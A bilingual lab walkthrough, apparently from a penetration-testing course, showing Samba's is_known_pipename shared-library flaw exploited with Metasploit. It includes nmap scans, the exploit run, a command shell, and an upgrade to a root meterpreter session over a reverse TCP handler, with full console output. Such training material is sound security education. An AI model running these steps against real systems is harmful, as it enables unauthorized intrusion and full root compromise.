Exploiting Samba
SMB (Server Message Block) is a network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a local network (LAN).
SMB uses port 445 (TCP). However, originally, SMB ran on top of NetBIOS using port 139.
Samba is the Linux implementation of SMB, and allows Windows systems to access Linux shares and devices.
Samba V3.5.0 is vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a share library to a writable share, and then cause the server to load and execute it.
利用Samba
SMB(服务器消息块)是一种网络文件共享协议,用于促进本地网络 (LAN) 上的计算机之间共享文件和外围设备。
SMB 使用端口 445 (TCP)。 然而,最初,SMB 使用端口 139 在 NetBIOS 之上运行。
Samba 是 SMB 的 Linux 实现,允许 Windows 系统访问 Linux 共享和设备。
Samba V3.5.0 存在远程代码执行漏洞,允许恶意客户端将共享库上传到可写共享,然后导致服务器加载并执行。
Demo: Exploiting Samba(演示:利用 Samba)
If you’ve ever worked within a Windows environment, then you should be familiar with SMB. SMB is used to share files or to create shares on a system, and then those shares can be accessed by other Windows systems within that local area network.
During the Windows exploitation section, we explored the process of exploiting SMB on Windows through the EternalBlue exploit or by exploiting the MS17-010 vulnerability.
It’s going to be the same thing here, where we are exploiting an inherent vulnerability within Samba. So we’re not looking for a misconfigured Samba server or a misconfigured Samba service that’s running on a target. Instead, we are going to be targeting a vulnerability that in this case can be found within Samba version 3.5.0.
A shared library is the Linux equivalent of a DLL file. They’re libraries that are called upon by services or programs. And in this case, what we’re doing is we’re connecting to Samba on the Linux target and then uploading a malicious shared library that will consequently provide us with a command shell. And we’ll take a look at how to upgrade that command shell to meterpreter session. And once the Samba server loads it and executes it, we are going to get access.
It works very similarly to the EternalBlue exploit. In that, we are exploiting an inherent vulnerability, not an SMB or a Samba misconfiguration.
1
2
ifconfig
eth1: inet 192.18.76.2
Start up the PostgreSQL service so that we can interact with the MSF database.
1
service postgresql start
Launch MSF console.
1
msfconsole
Create a workspace.
1
workspace -a samba
Set the global variable for the RHOSTS option. The global variable option will save us from manually or continually entering the target IP whenever we load a new module.
1
setg RHOSTS 192.18.76.3
Perform an Nmap scan on the target to identify what version of Samba is running on the target. We can do this by utilizing the db_nmap command, which will allow us to perform an Nmap scan from within the MSF console and consequently save the results into the MSF database.
-sS: Perform a SYN scan.
-sV: Perform a service detection scan.
-O: Perform an operating system detection scan.
1
db_nmap -sS -sV -O 192.18.76.3
Samba is_known_pipename() Arbitrary Module Load
This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.
Samba is_known_pipename() 任意模块加载
此模块在 Samba 版本 3.5.0 到 4.4.14、4.5.10 和 4.6.4 中触发任意共享库加载漏洞。此模块需要有效的凭据、可访问共享中的可写文件夹以及可写文件夹的服务器端路径知识。在某些情况下,匿名访问与常见文件系统位置相结合可用于自动利用此漏洞。
1
2
3
search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
show options
SMB_FOLDER: The directory to use within the writeable SMB share.
In our case, we haven’t enumerated any information regarding the SMB folders or the share name that contains the writable directory.
Run the check command, which will check if the target is vulnerable.
1
2
3
check
info
run
That is going to execute the exploit and is going to open up a command shell session.
1
2
ls
pwd # Print out our current working directory on the Linux target system.
Put this in the background using the keyboard combination Ctrl+z.
List out our sessions. We currently have a command shell session on the target.
1
sessions
We want to upgrade this to a meterpreter session because a meterpreter session is much better in regards to access on the target system.
Search for a post-exploitation module called shell_to_meterpreter.
1
2
3
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
In this case, we need to set the LHOST option, that is going to be the IP address of the host that will receive the connection from the payload. And then the LPORT is going to be the port for the payload to connect to. And then we need to set up the session id, which in this case is one because that’s the command session that we want to upgrade.
LHOST: In this case, we can utilize the interface name to set the IP address automatically.
1
2
3
set LHOST eth1
set SESSION 1
run
That’s going to upgrade our command shell session into a meterpreter session.
List out our sessions. We have a meterpreter session on the target system.
1
sessions 2
We can type in the sysinfo command to get an idea of what the system is running in regards to the distribution release version as well as the kernel version.
getuid: We can enumerate the permissions that we currently have by typing in the get user id. We have the user id of 0 (uid=0), which is the root user, which consequently means that we have the highest privileges available on the Linux target. And consequently means we don’t need to elevate our privileges.
1
2
meterpreter > sysinfo
meterpreter > getuid
That is how to exploit Samba on Linux.
Vulnerable File Sharing Service
Overview
The target server as described below is running a vulnerable file sharing server. Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a shell on the target!
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-178.pdf
我自己的思路
1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.59.47.2 netmask 255.255.255.0 broadcast 192.59.47.255
ether 02:42:c0:3b:2f:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.59.47.3
1
2
3
4
5
6
7
8
root@attackdefense:~# service postgresql start
[ ok ] Starting PostgreSQL 11 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a samba
[*] Added workspace: samba
[*] Workspace: samba
msf5 > setg RHOSTS 192.59.47.3
RHOSTS => 192.59.47.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf5 > db_nmap -sS -sV -O 192.59.47.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-02 10:56 UTC
[*] Nmap: Nmap scan report for target-1 (192.59.47.3)
[*] Nmap: Host is up (0.000049s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: MAC Address: 02:42:C0:3B:2F:03 (Unknown)
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=2/2%OT=139%CT=1%CU=32774%PV=N%DS=1%DC=D%G=Y%M=0242C0%T
[*] Nmap: OS:M=63DB96DE%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=I
[*] Nmap: OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
[*] Nmap: OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
[*] Nmap: OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
[*] Nmap: OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
[*] Nmap: OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
[*] Nmap: OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
[*] Nmap: OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
[*] Nmap: OS:N%T=40%CD=S)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: VICTIM-1
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.59.47.3 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.59.47.3 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf5 > search type:exploit name:samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
2 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
3 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
4 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
5 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
6 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
7 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
8 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
9 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
10 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
11 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
12 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
13 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.59.47.3 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
1
2
3
4
5
msf5 exploit(linux/samba/is_known_pipename) > check
[+] 192.89.91.3:445 - Samba version 4.1.17 found with writeable share 'exploitable'
[*] 192.89.91.3:445 - The target appears to be vulnerable.
msf5 exploit(linux/samba/is_known_pipename) > info
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf5 exploit(linux/samba/is_known_pipename) > run
[*] 192.59.47.3:445 - Using location \\192.59.47.3\exploitable\tmp for the path
[*] 192.59.47.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.59.47.3:445 - Share 'exploitable' has server-side path '/
[*] 192.59.47.3:445 - Uploaded payload to \\192.59.47.3\exploitable\tmp\QXzAIroD.so
[*] 192.59.47.3:445 - Loading the payload from server-side path /tmp/QXzAIroD.so using \\PIPE\/tmp/QXzAIroD.so...
[-] 192.59.47.3:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.59.47.3:445 - Loading the payload from server-side path /tmp/QXzAIroD.so using /tmp/QXzAIroD.so...
[+] 192.59.47.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.59.47.2:40283 -> 192.59.47.3:445) at 2023-02-02 11:06:45 +0000
ls
pwd
/tmp
^Z
Background session 1? [y/N] y
1
2
3
4
5
6
7
8
msf5 exploit(linux/samba/is_known_pipename) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.59.47.2:40283 -> 192.59.47.3:445 (192.59.47.3)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf5 exploit(linux/samba/is_known_pipename) > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
msf5 exploit(linux/samba/is_known_pipename) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf5 post(multi/manage/shell_to_meterpreter) > set LHOST eth1
LHOST => 192.59.47.2
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.59.47.2:4433
[*] Sending stage (985320 bytes) to 192.59.47.3
[*] Meterpreter session 2 opened (192.59.47.2:4433 -> 192.59.47.3:59248) at 2023-02-02 11:16:12 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.59.47.2:40283 -> 192.59.47.3:445 (192.59.47.3)
2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.59.47.3 192.59.47.2:4433 -> 192.59.47.3:59248 (192.59.47.3)
1
2
3
4
5
6
7
8
9
10
11
12
msf5 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 192.59.47.3
OS : Debian 8.11 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
